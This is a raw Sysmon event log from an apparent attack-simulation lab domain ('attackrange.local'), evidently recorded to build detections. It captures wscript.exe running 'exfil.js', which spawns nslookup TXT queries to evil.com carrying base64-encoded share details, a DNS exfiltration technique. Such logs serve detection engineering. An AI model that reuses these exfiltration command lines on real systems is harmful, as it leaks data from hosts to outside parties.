14:21:48.951{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-0746-000000005F02}4832C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.951{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-0746-000000005F02}4832C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.951{2E1864BB-18FC-629A-0746-000000005F02}48324012C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-0646-000000005F02}8140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.936{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-0746-000000005F02}4832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.936{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.936{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.936{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-0646-000000005F02}8140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.936{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.936{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.936{2E1864BB-18E0-629A-6742-000000005F02}39767028C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-0646-000000005F02}8140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.938{2E1864BB-18FC-629A-0646-000000005F02}8140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpjgx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.920{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nleatnarz.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000214767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.972{00000000-0000-0000-0000-000000000000}4188evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.840{00000000-0000-0000-0000-000000000000}388evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.767{00000000-0000-0000-0000-000000000000}6680evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.697{00000000-0000-0000-0000-000000000000}5552evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.610{00000000-0000-0000-0000-000000000000}5896evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.540{00000000-0000-0000-0000-000000000000}7864evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.465{00000000-0000-0000-0000-000000000000}5928evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.408{00000000-0000-0000-0000-000000000000}2812evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.337{00000000-0000-0000-0000-000000000000}7688evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.262{00000000-0000-0000-0000-000000000000}7388evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.198{00000000-0000-0000-0000-000000000000}1368evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.136{00000000-0000-0000-0000-000000000000}7284evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.063{00000000-0000-0000-0000-000000000000}8104evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.974{00000000-0000-0000-0000-000000000000}7608evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000214753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.904{2E1864BB-18FC-629A-0446-000000005F02}59361700C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-0546-000000005F02}7408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.904{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.904{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-0546-000000005F02}7408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.904{2E1864BB-18FC-629A-0346-000000005F02}76645824C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-0546-000000005F02}7408C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.908{2E1864BB-18FC-629A-0546-000000005F02}7408C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-0346-000000005F02}7664C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleatnarz.tmp 2>&1 10341000x8000000000000000214745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.883{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-0446-000000005F02}5936C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.883{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-0446-000000005F02}5936C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.883{2E1864BB-18FC-629A-0446-000000005F02}59361700C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-0346-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.867{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-0446-000000005F02}5936C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.867{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.867{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.867{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-0346-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.867{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.867{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 